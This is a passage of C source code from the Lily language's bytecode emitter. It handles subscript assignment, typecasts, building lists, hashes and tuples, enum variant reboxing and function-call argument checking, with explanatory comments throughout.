emit->code[save_pos] = emit->code_pos - emit->block->jump_offset; ast->result = (lily_sym *)result; } else /* If is_top is false, then this tree has a parent that's binary and has the same op. The parent won't write a jump_if for this tree, because that would be a double-test. Setting this to NULL anyway as a precaution. */ ast->result = NULL; } /* emit_sub_assign This handles an assignment where the left side has a subscript involved (ex: x[0] = 10). This handles compound ops as well as all subscript assigning types (list, hash, and tuple) There are three parts: The var, the index, and the new value (right). Var: ast->left->arg_start Index: ast->left->arg_start->next Right: ast->right */ static void eval_sub_assign(lily_emit_state *emit, lily_ast *ast) { lily_ast *var_ast = ast->left->arg_start; lily_ast *index_ast = var_ast->next_arg; lily_sym *rhs; lily_type *elem_type; /* This gets the type that the left will be without actually evaluating it. It is important to not run the left before the right, because assigns should be right to left. */ lily_type *left_type = determine_left_type(emit, ast->left); if (ast->right->tree_type != tree_local_var) eval_tree(emit, ast->right, left_type, 1); rhs = ast->right->result; if (var_ast->tree_type != tree_local_var) { eval_tree(emit, var_ast, NULL, 1); if (var_ast->result->flags & SYM_NOT_ASSIGNABLE) { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Left side of %s is not assignable.\n", opname(ast->op)); } } if (index_ast->tree_type != tree_local_var) eval_tree(emit, index_ast, NULL, 1); check_valid_subscript(emit, var_ast, index_ast); elem_type = get_subscript_result(var_ast->result->type, index_ast); if (elem_type != rhs->type && elem_type->cls->id != SYM_CLASS_ANY) { emit->raiser->line_adjust = ast->line_num; bad_assign_error(emit, ast->line_num, elem_type, rhs->type); } if (ast->op > expr_assign) { /* For a compound assignment to work, the left side must be subscripted to get the value held. */ lily_storage *subs_storage = get_storage(emit, elem_type); write_5(emit, o_get_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, subs_storage->reg_spot); ast->left->result = (lily_sym *)subs_storage; /* Run the compound op now that ->left is set properly. */ emit_op_for_compound(emit, ast); rhs = ast->result; } write_5(emit, o_set_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, rhs->reg_spot); ast->result = rhs; } /* eval_typecast This handles writing a typecast. A typecast has two parts: Value: ast->arg_start type: ast->arg_start->next_arg->type */ static void eval_typecast(lily_emit_state *emit, lily_ast *ast) { lily_type *cast_type = ast->arg_start->next_arg->typecast_type; lily_ast *right_tree = ast->arg_start; if (right_tree->tree_type != tree_local_var) eval_tree(emit, right_tree, NULL, 1); lily_type *var_type = right_tree->result->type; if (cast_type == var_type) ast->result = (lily_sym *)right_tree->result; else if (cast_type->cls->id == SYM_CLASS_ANY) { /* This function automatically fixes right_tree's result to the new any value. */ emit_rebox_to_any(emit, right_tree); ast->result = right_tree->result; } else if (var_type->cls->id == SYM_CLASS_ANY) { lily_storage *result = get_storage(emit, cast_type); write_4(emit, o_any_typecast, ast->line_num, right_tree->result->reg_spot, result->reg_spot); ast->result = (lily_sym *)result; } else { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Cannot cast type '^T' to type '^T'.\n", var_type, cast_type); } } /* eval_unary_op This handles unary ops. Unary ops currently only work on integers. */ static void eval_unary_op(lily_emit_state *emit, lily_ast *ast) { uint16_t opcode; lily_class *lhs_class; lily_storage *storage; lhs_class = ast->left->result->type->cls; lily_class *integer_class = emit->symtab->integer_class; if (lhs_class != integer_class) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Invalid operation: %s%s.\n", opname(ast->op), lhs_class->name); storage = get_storage(emit, integer_class->type); storage->flags |= SYM_NOT_ASSIGNABLE; if (ast->op == expr_unary_minus) opcode = o_unary_minus; else if (ast->op == expr_unary_not) opcode = o_unary_not; else opcode = -1; write_4(emit, opcode, ast->line_num, ast->left->result->reg_spot, storage->reg_spot); ast->result = (lily_sym *)storage; } /* rebox_enum_variant_values This function is called when building a list or a hash and the values contain at least one variant or enum value. In the event that there is not a common type, the function attempts to find one by looking at the common parts between each value. If all values are of a given enum class or variants of that class, then the function ensures that the variants are put into an enum class value of the common type. If the common type is incomplete (some of the generics of the enum class are not specified), then missing parts are given the class 'any', and the values are put into an enum class value of some type. If there is no common type, then each variant is put into an enum class value based upon information known to only it, and all values are put into an 'any' value (except those that are already 'any'). This is unlikely. */ static void rebox_enum_variant_values(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int is_hash) { lily_ast *tree_iter = ast->arg_start; lily_type *rebox_type = NULL; lily_class *any_class = emit->symtab->any_class; /* If ast is tree_hash (is_hash == 1), then the values are key, value, key value, and so on. This is about the values, not the keys. */ if (is_hash) tree_iter = tree_iter->next_arg; /* Raise the ceiling so that lily_ts_match doesn't damage the current generic information. */ int adjust = lily_ts_raise_ceiling(emit->ts); lily_class *first_cls = tree_iter->result->type->cls; lily_type *matching_type = NULL; int ok = 1; /* The first order of business is to find the type that parser created which has a class of the enum class, and all generics. ex: enum class Option[A] { Some(A), None } For the above, there's a Option[A] made by parser. Get that. If that isn't possible, then everything gets to be smacked to any. */ if (first_cls->flags & CLS_VARIANT_CLASS) first_cls = first_cls->parent; if (first_cls->flags & CLS_ENUM_CLASS && first_cls != any_class) { matching_type = first_cls->variant_type; } else ok = 0; if (matching_type != NULL) { /* lily_ts_check is awesome. It makes sure that stuff matches while also solving stuff. Begin by throwing in what the caller wants (if the caller knows what they want). This is important, because the caller may want Option[integer] but have [None, None, None]. The three None values should upgrade to Option[integer], not Option[any] as they would do otherwise. */ if (expect_type) lily_ts_check(emit->ts, matching_type, expect_type); while (tree_iter != NULL) { lily_type *type = tree_iter->result->type; /* If there's some disagreement, give up and let everything default to any. */ if (lily_ts_check(emit->ts, matching_type, type) == 0) { ok = 0; break; } tree_iter = tree_iter->next_arg; if (is_hash && tree_iter) tree_iter = tree_iter->next_arg; } } /* If there are some generics unresolved (ex: [None, None, None] where there ISN'T a caller value to infer from), then lily_ts_resolve helps out by defaulting the unsolved generics to type any. */ if (ok) rebox_type = lily_ts_resolve(emit->ts, matching_type); else rebox_type = any_class->type; tree_iter = ast->arg_start; if (is_hash) tree_iter = tree_iter->next_arg; /* Bash everything into the appropriate type. emit_rebox_value will have the variant types first boxed into an enum based off of their individual info before shoving them into an any. */ while (tree_iter) { if (tree_iter->result->type != rebox_type) emit_rebox_value(emit, rebox_type, tree_iter); tree_iter = tree_iter->next_arg; if (is_hash && tree_iter) tree_iter = tree_iter->next_arg; } lily_ts_lower_ceiling(emit->ts, adjust); } /* hash_values_to_anys This converts all of the values of the given ast into anys using o_assign. The result of each value is rewritten to be the any, instead of the old value. emit: The emitter holding the function to write code to. hash_ast: An ast of type tree_hash which has already been evaluated. Caveats: * Caller must do this before writing the o_build_hash instruction out. * Caller must evaluate the hash before calling this. */ static void emit_hash_values_to_anys(lily_emit_state *emit, lily_ast *hash_ast) { /* The keys and values are in hash_ast as args. Since they're in pairs and this only modifies the values, this is how many values there are. */ int value_count = hash_ast->args_collected / 2; /* Make a single large prep that will cover everything needed. This ensures that any growing will be done all at once, instead of in smaller blocks. */ write_prep(emit, value_count * 4); lily_ast *iter_ast; for (iter_ast = hash_ast->arg_start; iter_ast != NULL; iter_ast = iter_ast->next_arg->next_arg) { emit_rebox_to_any(emit, iter_ast->next_arg); } } /* emit_list_values_to_anys This converts all of the values of the given ast into anys using o_assign. The result of each value is rewritten to be the any, instead of the old value. emit: The emitter holding the function to write code to. list_ast: An ast of type tree_list which has already been evaluated. Caveats: * Caller must do this before writing the o_build_list_tuple instruction. * Caller must evaluate the list before calling this. */ static void emit_list_values_to_anys(lily_emit_state *emit, lily_ast *list_ast) { int value_count = list_ast->args_collected; write_prep(emit, value_count * 4); lily_ast *iter_ast; for (iter_ast = list_ast->arg_start; iter_ast != NULL; iter_ast = iter_ast->next_arg) { emit_rebox_to_any(emit, iter_ast); } } /* eval_build_hash This handles evaluating trees that are of type tree_hash. This tree is created from a static hash (ex: ["a" => 1, "b" => 2, ...]). Parser has chained the keys and values in a tree_hash as arguments. The arguments are key, value, key, value, key, value. Thus, ->args_collected is the number of items, not the number of pairs collected. Caveats: * Keys can't default to "any", because "any" is not immutable. emit: The emit state containing a function to write the resulting code to. ast: An ast of type tree_hash. */ static void eval_build_hash(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_ast *tree_iter; lily_type *last_key_type = NULL, *last_value_type = NULL, *expect_key_type = NULL, *expect_value_type = NULL; int make_anys = 0, found_variant_or_enum = 0; if (expect_type) { int ok = setup_types_for_build(emit, expect_type, SYM_CLASS_HASH, did_resolve); if (ok) { expect_key_type = lily_ts_get_ceiling_type(emit->ts, 0); expect_value_type = lily_ts_get_ceiling_type(emit->ts, 1); } } for (tree_iter = ast->arg_start; tree_iter != NULL; tree_iter = tree_iter->next_arg->next_arg) { lily_ast *key_tree, *value_tree; key_tree = tree_iter; value_tree = tree_iter->next_arg; if (key_tree->tree_type != tree_local_var) eval_tree(emit, key_tree, expect_key_type, 1); /* Keys -must- all be the same type. They cannot be converted to any later on because any are not valid keys (not immutable). */ if (key_tree->result->type != last_key_type) { if (last_key_type == NULL) { if ((key_tree->result->type->cls->flags & CLS_VALID_HASH_KEY) == 0) { lily_raise_adjusted(emit->raiser, key_tree->line_num, lily_SyntaxError, "Resulting type '^T' is not a valid hash key.\n", key_tree->result->type); } last_key_type = key_tree->result->type; } else { lily_raise_adjusted(emit->raiser, key_tree->line_num, lily_SyntaxError, "Expected a key of type '^T', but key is of type '^T'.\n", last_key_type, key_tree->result->type); } } if (value_tree->tree_type != tree_local_var) eval_tree(emit, value_tree, expect_value_type, 1); /* Only mark user-defined enum classes/variants, because those are the ones that can default. */ if (value_tree->result->type->cls->flags & (CLS_VARIANT_CLASS | CLS_ENUM_CLASS) && value_tree->result->type->cls->id != SYM_CLASS_ANY) found_variant_or_enum = 1; /* Values being promoted to any is okay though. :) */ if (value_tree->result->type != last_value_type) { if (last_value_type == NULL) last_value_type = value_tree->result->type; else make_anys = 1; } } if (ast->args_collected == 0) { last_key_type = expect_key_type; last_value_type = expect_value_type; } else { if (found_variant_or_enum) rebox_enum_variant_values(emit, ast, expect_value_type, 1); else if (make_anys || (expect_value_type && expect_value_type->cls->id == SYM_CLASS_ANY)) emit_hash_values_to_anys(emit, ast); last_value_type = ast->arg_start->next_arg->result->type; } lily_class *hash_cls = emit->symtab->hash_class; lily_ts_set_ceiling_type(emit->ts, last_key_type, 0); lily_ts_set_ceiling_type(emit->ts, last_value_type, 1); lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, hash_cls, 2, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_hash, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* check_proper_variant Make sure that the variant has the proper inner type to satisfy the type wanted by the enum. */ static int check_proper_variant(lily_emit_state *emit, lily_type *enum_type, lily_type *given_type, lily_class *variant_cls) { lily_type *variant_type = variant_cls->variant_type; int i, result = 1; if (variant_type->subtype_count != 0) { lily_type *variant_result = variant_type->subtypes[0]; for (i = 0;i < variant_result->subtype_count;i++) { /* The variant may not have all the generics that the parent does. Consider the variant to be proper if the generics that it has match up to the enum type. Ex: For SomeVariant[B] and SomeEnum[A, B], consider it right if the B's match. */ int pos = variant_result->subtypes[i]->generic_pos; if (given_type->subtypes[i] != enum_type->subtypes[pos]) { result = 0; break; } } } /* else the variant takes no generics, and nothing can be wrong. */ return result; } /* enum_membership_check Given a type which is for some enum class, determine if 'right' is a member of the enum class. Returns 1 if yes, 0 if no. */ static int enum_membership_check(lily_emit_state *emit, lily_type *enum_type, lily_type *right) { lily_class *variant_class = right->cls; lily_class *enum_class = enum_type->cls; int ok = 1; /* A variant's parent is always the enum class that it belongs to. */ if (variant_class->parent == enum_class) { /* If the variant does not take arguments, then there's nothing that could have been called wrong. Therefore, the use of the variant MUST be correct. */ if (right->subtype_count != 0) ok = check_proper_variant(emit, enum_type, right, variant_class); } else ok = 0; return ok; } /* type_matchup This is called when 'right' doesn't have quite the right type. If the wanted type is 'any', the value of 'right' is made into an any. On success: right is fixed, 1 is returned. On failure: right isn't fixed, 0 is returned. */ static int type_matchup(lily_emit_state *emit, lily_type *want_type, lily_ast *right) { int ret = 1; if (want_type->cls->id == SYM_CLASS_ANY) emit_rebox_to_any(emit, right); else if (want_type->cls->flags & CLS_ENUM_CLASS) { ret = enum_membership_check(emit, want_type, right->result->type); if (ret) emit_rebox_value(emit, want_type, right); } else ret = 0; return ret; } /* eval_build_list This writes an instruction to build a list from a set of values given. If all list elements have the same type, the resulting list shall be of the common type (Ex: [1, 2, 3] is a list[integer]). If they do not, the resulting type shall be list[any]. */ static void eval_build_list(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_resolve) { lily_type *elem_type = NULL; lily_ast *arg; int found_variant_or_enum = 0, make_anys = 0; if (expect_type) { if (ast->args_collected == 0) { lily_type *check_type; if (expect_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { check_type = lily_ts_easy_resolve(emit->ts, expect_type); } else check_type = expect_type; if (check_type && check_type->cls->id == SYM_CLASS_HASH) { eval_build_hash(emit, ast, expect_type, 1); return; } } int ok = setup_types_for_build(emit, expect_type, SYM_CLASS_LIST, did_resolve); if (ok) { elem_type = lily_ts_get_ceiling_type(emit->ts, 0); expect_type = elem_type; } } lily_type *last_type = NULL; for (arg = ast->arg_start;arg != NULL;arg = arg->next_arg) { if (arg->tree_type != tree_local_var) eval_tree(emit, arg, elem_type, 1); /* 'any' is marked as an enum class, but this is only interested in user-defined enum classes (which have special defaulting). */ if ((arg->result->type->cls->flags & (CLS_ENUM_CLASS | CLS_VARIANT_CLASS)) && arg->result->type->cls->id != SYM_CLASS_ANY) found_variant_or_enum = 1; if (arg->result->type != last_type) { if (last_type == NULL) last_type = arg->result->type; else make_anys = 1; } } if (elem_type == NULL && last_type == NULL) { /* This happens when there's an empty list and a list is probably not expected. Default to list[any] and hope that's right. */ lily_class *cls = emit->symtab->any_class; elem_type = cls->type; } else if (last_type != NULL) { if (found_variant_or_enum) rebox_enum_variant_values(emit, ast, expect_type, 0); else if (make_anys || (elem_type && elem_type->cls->id == SYM_CLASS_ANY)) emit_list_values_to_anys(emit, ast); /* else all types already match, so nothing to do. */ /* At this point, all list values are guaranteed to have the same type, so this works. */ elem_type = ast->arg_start->result->type; } lily_ts_set_ceiling_type(emit->ts, elem_type, 0); lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, emit->symtab->list_class, 1, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_list_tuple, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* eval_build_tuple This handles creation of a tuple from a series of values. The resulting tuple will have a type that matches what it obtained. <[1, "2", 3.3]> # tuple[integer, string, double] This attempts to do the same sort of defaulting that eval_build_list and eval_build_hash do: tuple[any] t = <[1]> # Becomes tuple[any]. */ static void eval_build_tuple(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, int did_unwrap) { if (ast->args_collected == 0) { lily_raise(emit->raiser, lily_SyntaxError, "Cannot create an empty tuple.\n"); } /* It is not possible to use setup_types_for_build here, because tuple takes N types and subtrees may damage those types. Those types also cannot be hidden, because the expected type may contain generics that the callee may attempt to check the resolution of. Just...don't unwrap things more than once here. */ if (expect_type && expect_type->cls->id == SYM_CLASS_GENERIC && did_unwrap == 0) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_unwrap = 1; } if (expect_type && (expect_type->cls->id != SYM_CLASS_TUPLE || expect_type->subtype_count != ast->args_collected)) expect_type = NULL; int i; lily_ast *arg; for (i = 0, arg = ast->arg_start; arg != NULL; i++, arg = arg->next_arg) { lily_type *elem_type = NULL; /* It's important to do this for each pass because it allows the inner trees to infer types that this tree's parent may want. */ if (expect_type) { elem_type = expect_type->subtypes[i]; if (did_unwrap == 0 && elem_type && elem_type->cls->id == SYM_CLASS_GENERIC) { elem_type = lily_ts_easy_resolve(emit->ts, elem_type); } } if (arg->tree_type != tree_local_var) eval_tree(emit, arg, elem_type, 1); if (elem_type && elem_type != arg->result->type) /* Attempt to fix the type to what's wanted. If it fails, the parent tree will note a type mismatch. Can't do anything else here though. */ type_matchup(emit, elem_type, arg); } for (i = 0, arg = ast->arg_start; i < ast->args_collected; i++, arg = arg->next_arg) { lily_ts_set_ceiling_type(emit->ts, arg->result->type, i); } lily_type *new_type = lily_ts_build_by_ceiling(emit->ts, emit->symtab->tuple_class, i, 0); lily_storage *s = get_storage(emit, new_type); write_build_op(emit, o_build_list_tuple, ast->arg_start, ast->line_num, ast->args_collected, s->reg_spot); ast->result = (lily_sym *)s; } /* eval_subscript Evaluate a subscript, returning the resulting value. This handles subscripts of list, hash, and tuple. */ static void eval_subscript(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type) { lily_ast *var_ast = ast->arg_start; lily_ast *index_ast = var_ast->next_arg; if (var_ast->tree_type != tree_local_var) eval_tree(emit, var_ast, NULL, 1); if (index_ast->tree_type != tree_local_var) eval_tree(emit, index_ast, NULL, 1); check_valid_subscript(emit, var_ast, index_ast); lily_type *type_for_result; type_for_result = get_subscript_result(var_ast->result->type, index_ast); lily_storage *result = get_storage(emit, type_for_result); write_5(emit, o_get_item, ast->line_num, var_ast->result->reg_spot, index_ast->result->reg_spot, result->reg_spot); if (var_ast->result->flags & SYM_NOT_ASSIGNABLE) result->flags |= SYM_NOT_ASSIGNABLE; ast->result = (lily_sym *)result; } /******************************************************************************/ /* Call handling */ /******************************************************************************/ /* Function calls are rather complex things, and so they have everything under this area. To begin with, Lily supports the following kinds of calls: * x() # This is a simple call. * x.y() # x is an instance of some class. y is either a property of the # class, or a class method. 'x' is added as the first argument # of the call. * {|| 10} () # A call of a lambda. Weird, but okay. * x[0]() # A call of a subscript result. * x()() # A call of a call result. enum class Option[A] { Some(A), None } * x = Some(10) # A 'call' of a variant type. eval_variant handles writing out # the code, but the arguments given pass through the same type # checking that a regular call's arguments pass through. Calls are also the backbone of type inference. The arguments they expect are passed down to evaluated trees. List, hash, and tuple eval all use the types that are given to infer what they can. However, calls also need to infer a a little bit. One example is that if a call wants type any, but a non-any is supplied, it will 'rebox' the non-any into an any. Finally, calls must keep track of their arguments. This is kept track of using a min and a max. Most functions take a set number of arguments, and min will be the same as max. However, min is less than max for functions that have optional arguments. Max is set to -1 for functions that take varargs. It is currently not possible for a function to be both optargs and varargs. */ static void add_call_state(lily_emit_state *emit) { lily_emit_call_state *new_state = lily_malloc(sizeof(lily_emit_call_state)); if (emit->call_state != NULL) emit->call_state->next = new_state; new_state->prev = emit->call_state; new_state->next = NULL; new_state->item = NULL; new_state->call_type = NULL; emit->call_state = new_state; } static void grow_call_values(lily_emit_state *emit) { emit->call_values_size *= 2; emit->call_values = lily_realloc(emit->call_values, sizeof(lily_sym *) * emit->call_values_size); } static void add_value(lily_emit_state *emit, lily_emit_call_state *cs, lily_sym *sym) { if (emit->call_values_pos == emit->call_values_size) grow_call_values(emit); emit->call_values[emit->call_values_pos] = sym; emit->call_values_pos++; cs->arg_count++; } static lily_type *get_expected_type(lily_emit_call_state *cs, int pos) { lily_type *result; if (cs->vararg_start > (pos + 1)) { /* The + 1 is because the return type of a function is the first subtype inside of it. */ result = cs->call_type->subtypes[pos + 1]; if (result->cls->id == SYM_CLASS_OPTARG) result = result->subtypes[0]; } else { /* There's no check for optarg here because there's no such thing as varargs with optional values. */ result = cs->vararg_elem_type; } return result; } static void condense_args(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *type, uint16_t from, uint16_t to) { int i; int offset = (emit->call_values_pos - cs->arg_count) + from; int count = to - from; lily_storage *s = get_storage(emit, type); write_prep(emit, 4 + count); emit->code[emit->code_pos] = o_build_list_tuple; emit->code[emit->code_pos + 1] = cs->ast->line_num; emit->code[emit->code_pos + 2] = count; for (i = 0;i < count;i++) emit->code[emit->code_pos + 3 + i] = emit->call_values[offset + i]->reg_spot; /* The individual extra values are gone now... */ emit->call_values_pos -= count; cs->arg_count -= count; /* With the list of them added in place of it. */ add_value(emit, cs, (lily_sym *)s); emit->code[emit->code_pos + 3 + i] = s->reg_spot; emit->code_pos += 4 + i; } /* eval_call_arg Evaluate the argument of a function call and do some type matching up on the result. This is different than type_matchup, because it's a fair chance that the arguments may hold information about generics. */ static void eval_call_arg(lily_emit_state *emit, lily_emit_call_state *cs, lily_ast *arg) { lily_type *want_type = get_expected_type(cs, cs->arg_count); if (want_type->cls->id == SYM_CLASS_OPTARG) want_type = want_type->subtypes[0]; if (arg->tree_type != tree_local_var) /* Calls fill in their type info as they go along, courteousy of their arguments. So the types are NEVER resolved. */ eval_tree(emit, arg, want_type, 0); /* This is used so that type_matchup gets the resolved type (if there is one) because the resolved type might be 'any'. */ lily_type *matchup_type = want_type; /* Don't allow bare variants to solve for a type. Always force them to be in something to prevent bare variant values. */ if (arg->result->type->cls->flags & CLS_VARIANT_CLASS) { cs->have_bare_variants = 1; if (want_type->cls->id == SYM_CLASS_GENERIC) { matchup_type = lily_ts_easy_resolve(emit->ts, want_type); if (matchup_type == NULL) rebox_variant_to_enum(emit, arg); } } lily_type *match_type = want_type; if (want_type->cls->id == SYM_CLASS_GENERIC) match_type = lily_ts_easy_resolve(emit->ts, want_type); /* ok == 0 protects from potentially attempting to resolve the same generic twice, which breaks things. */ if (lily_ts_check(emit->ts, want_type, arg->result->type) || type_matchup(emit, match_type, arg)) { add_value(emit, cs, arg->result); } else bad_arg_error(emit, cs, arg->result->type, want_type); } /* box_call_variants This function is called when check_call_args is done processing arguments AND the call has been tagged by the symtab as having enum values. This function exists because it's possible for a Lily function to not know what the resulting enum class should be. In such a case, call argument processing calls this to make sure any variants are put into a proper enum class value. */ static void box_call_variants(lily_emit_state *emit, lily_emit_call_state *cs) { int num_args = cs->call_type->subtype_count - 1; int i; lily_sym *sym; int offset = emit->call_values_pos - cs->arg_count; uint32_t line_num = cs->ast->line_num; if (cs->vararg_start != (uint16_t)-1) num_args--; for (i = 0;i != num_args;i++) { sym = emit->call_values[offset + i]; if (sym->type->cls->flags & CLS_VARIANT_CLASS) { lily_type *enum_type = lily_ts_resolve(emit->ts, get_expected_type(cs, i)); sym = (lily_sym *)emit_rebox_sym(emit, enum_type, sym, line_num); emit->call_values[offset + i] = sym; } } if (i != cs->arg_count && cs->vararg_elem_type->cls->flags & CLS_ENUM_CLASS && cs->vararg_elem_type->cls != emit->symtab->any_class) { lily_type *solved_elem_type = lily_ts_resolve(emit->ts, get_expected_type(cs, i)); for (;i != cs->arg_count;i++) { sym = emit->call_values[offset + i]; /* This is called before the varargs are shoved into a list, so looping over the args is fine. Varargs is represented as a list of some type, so this next line grabs the list, then what the list holds. */ if (sym->type->cls->flags & CLS_VARIANT_CLASS) { sym = (lily_sym *)emit_rebox_sym(emit, solved_elem_type, sym, line_num); emit->call_values[offset + i] = sym; } } } } /* verify_argument_count This makes sure that the function being called (specified by 'ast') is being called with the right number of arguments. This is slightly tricky, because of optional arguments and variable arguments. */ static void verify_argument_count(lily_emit_state *emit, lily_emit_call_state *cs, int num_args) { lily_type *call_type = cs->call_type; /* The -1 is because the return type of a function is the first type. */ int args_needed = cs->call_type->subtype_count - 1; unsigned int min = args_needed; unsigned int max = args_needed; /* A function can be either varargs or optargs. They cannot coexist because parser does not allow a default value for varargs, and varargs must always be last. */ if (call_type->flags & TYPE_HAS_OPTARGS) { int i; for (i = 1;i < call_type->subtype_count;i++) { if (call_type->subtypes[i]->cls->id == SYM_CLASS_OPTARG) break; } min = i - 1; } else if (call_type->flags & TYPE_IS_VARARGS) { max = (unsigned int)-1; min = args_needed - 1; } if (num_args < min || num_args > max) { push_info_to_error(emit, cs); lily_msgbuf *msgbuf = emit->raiser->msgbuf; lily_msgbuf_add(msgbuf, " expects "); if (max == (unsigned int)-1) lily_msgbuf_add_fmt(msgbuf, "at least %d args", min); else if (max > min) lily_msgbuf_add_fmt(msgbuf, "%d to %d args", min, max); else lily_msgbuf_add_fmt(msgbuf, "%d args", min); lily_msgbuf_add_fmt(msgbuf, ", but got %d.\n", num_args); emit->raiser->line_adjust = cs->ast->line_num; lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } } /* check_call_args eval_call uses this to make sure the types of all the arguments are right. If the function takes varargs, the extra arguments are packed into a list of the vararg type. */ static void eval_verify_call_args(lily_emit_state *emit, lily_emit_call_state *cs, lily_type *expect_type, int did_resolve) { lily_ast *ast = cs->ast; int num_args = ast->args_collected; lily_tree_type call_tt = ast->arg_start->tree_type; if (call_tt == tree_defined_func) { /* Do a self insert if the thing being called belongs to this class. */ lily_var *first_result = ((lily_var *)ast->arg_start->sym); if (emit->current_class != NULL && emit->current_class == first_result->parent) { add_value(emit, cs, (lily_sym *)emit->block->self); } else num_args--; } else if (call_tt != tree_oo_access) num_args--; /* ast->args_collected includes the first tree in that count. If the first tree doesn't provide that value, then the argument count must be adjusted. */ verify_argument_count(emit, cs, num_args); /* Since this assumes there is at least one argument needed, it has to come after verifying the argument count. */ if (call_tt == tree_oo_access) { lily_ts_check(emit->ts, get_expected_type(cs, 0), ast->arg_start->arg_start->result->type); /* For x.y kinds of accesses, add the (evaluated) 'x' as the first value. */ add_value(emit, cs, ast->arg_start->arg_start->result); } if (cs->call_type->flags & TYPE_IS_UNRESOLVED) { if (call_tt == tree_local_var || call_tt == tree_inherited_new) { /* This forces each generic to be resolved as itself. (A = A, B = B, etc.). This is really important. tree_local_var: define f[A](a: function (A => A), b: A) If g is called, it can't resolve what A is. It gets that information from f. I call this being 'quasi-solved'. tree_inherited_new: class one[A, B](a: A, b: B) { ... } class two[A, B, C](a: A, b: B, c: C) < one(b, a) # INVALID By forcing 'two' to have the same generic ordering as 'one', Lily greatly simplifies generics handling. The A of one is the A of two. */ lily_ts_resolve_as_self(emit->ts); } else { lily_type *call_result = cs->call_type->subtypes[0]; if (call_result && expect_type && did_resolve) { /* If the caller wants something and the result is that same sort of thing, then fill in info based on what the caller wants. */ if (expect_type->cls->id == call_result->cls->id) { /* The return isn't checked because there will be a more accurate problem that is likely to manifest later. */ lily_ts_check(emit->ts, call_result, expect_type); } else if (expect_type->cls->flags & CLS_ENUM_CLASS && call_result->cls->parent == expect_type->cls) { lily_ts_resolve_as_variant_by_enum(emit->ts, call_result, expect_type); } } } } lily_ast *arg; for (arg = ast->arg_start->next_arg;arg != NULL;arg = arg->next_arg) eval_call_arg(emit, cs, arg); if (cs->have_bare_variants) box_call_variants(emit, cs); if (cs->call_type->flags & TYPE_IS_VARARGS) { int va_pos = cs->call_type->subtype_count - 1; lily_type *vararg_type = cs->call_type->subtypes[va_pos]; if (vararg_type->flags & TYPE_IS_UNRESOLVED) vararg_type = lily_ts_resolve(emit->ts, vararg_type); condense_args(emit, cs, vararg_type, cs->call_type->subtype_count - 2, cs->arg_count); } } static lily_emit_call_state *begin_call(lily_emit_state *emit, lily_ast *ast) { lily_emit_call_state *result = emit->call_state; if (result->next == NULL) add_call_state(emit); emit->call_state = result->next; result->ast = ast; result->arg_count = 0; result->have_bare_variants = 0; lily_ast *first_tree = ast->arg_start; lily_tree_type first_tt = first_tree->tree_type; lily_item *call_item = NULL; lily_item *debug_item = NULL; lily_type *call_type = NULL; if (first_tt == tree_defined_func || first_tt == tree_inherited_new) call_item = ast->arg_start->item; else if (first_tt == tree_oo_access) { eval_oo_access_for_item(emit, ast->arg_start); if (first_tree->item->flags & ITEM_TYPE_PROPERTY) { debug_item = (lily_item *)first_tree->property; oo_property_read(emit, first_tree); call_item = (lily_item *)first_tree->result; } else call_item = first_tree->item; } else if (first_tt != tree_variant) { eval_tree(emit, ast->arg_start, NULL, 1); call_item = (lily_item *)ast->arg_start->result; if (first_tt == tree_upvalue || first_tt == tree_open_upvalue) debug_item = ast->arg_start->item; } else { call_item = (lily_item *)ast->arg_start->variant_class; call_type = ast->arg_start->variant_class->variant_type; } if (debug_item == NULL) debug_item = call_item; if (call_type == NULL) call_type = ((lily_sym *)call_item)->type; if (call_type->cls->id != SYM_CLASS_FUNCTION && first_tt != tree_variant) lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "Cannot anonymously call resulting type '^T'.\n", call_type); result->item = call_item; result->call_type = call_type; result->error_item = debug_item; if (call_type->flags & TYPE_IS_VARARGS) { /* The vararg type is always the last type in the function. It is represented as a list. The first type of that list is the type that each vararg entry will need to be. */ int va_pos = call_type->subtype_count - 1; result->vararg_elem_type = call_type->subtypes[va_pos]->subtypes[0]; result->vararg_start = va_pos; } else { result->vararg_elem_type = NULL; result->vararg_start = (uint16_t)-1; } return result; } static void write_call(lily_emit_state *emit, lily_emit_call_state *cs) { int offset = emit->call_values_pos - cs->arg_count; lily_sym *call_sym = cs->sym; lily_ast *ast = cs->ast; write_prep(emit, 6 + cs->arg_count); emit->code[emit->code_pos] = o_function_call; emit->code[emit->code_pos+1] = ast->line_num; emit->code[emit->code_pos+2] = !!(call_sym->flags & VAR_IS_READONLY); emit->code[emit->code_pos+3] = call_sym->reg_spot; emit->code[emit->code_pos+4] = cs->arg_count; int i, j; for (i = 5, j = 0;j < cs->arg_count;i++, j++) { emit->code[emit->code_pos + i] = emit->call_values[offset + j]->reg_spot; } if (cs->call_type->subtypes[0] != NULL) { lily_type *return_type = cs->call_type->subtypes[0]; /* If it's just a generic, grab the appropriate thing from the type stack (which is okay until the next eval_call). Otherwise, just give up and build the right thing. */ if (return_type->cls->id == SYM_CLASS_GENERIC) return_type = lily_ts_easy_resolve(emit->ts, return_type); else if (return_type->flags & TYPE_IS_UNRESOLVED) return_type = lily_ts_resolve(emit->ts, return_type); lily_storage *storage = get_storage(emit, return_type); storage->flags |= SYM_NOT_ASSIGNABLE; ast->result = (lily_sym *)storage; emit->code[emit->code_pos+i] = ast->result->reg_spot; } else { /* It's okay to not push a return value, 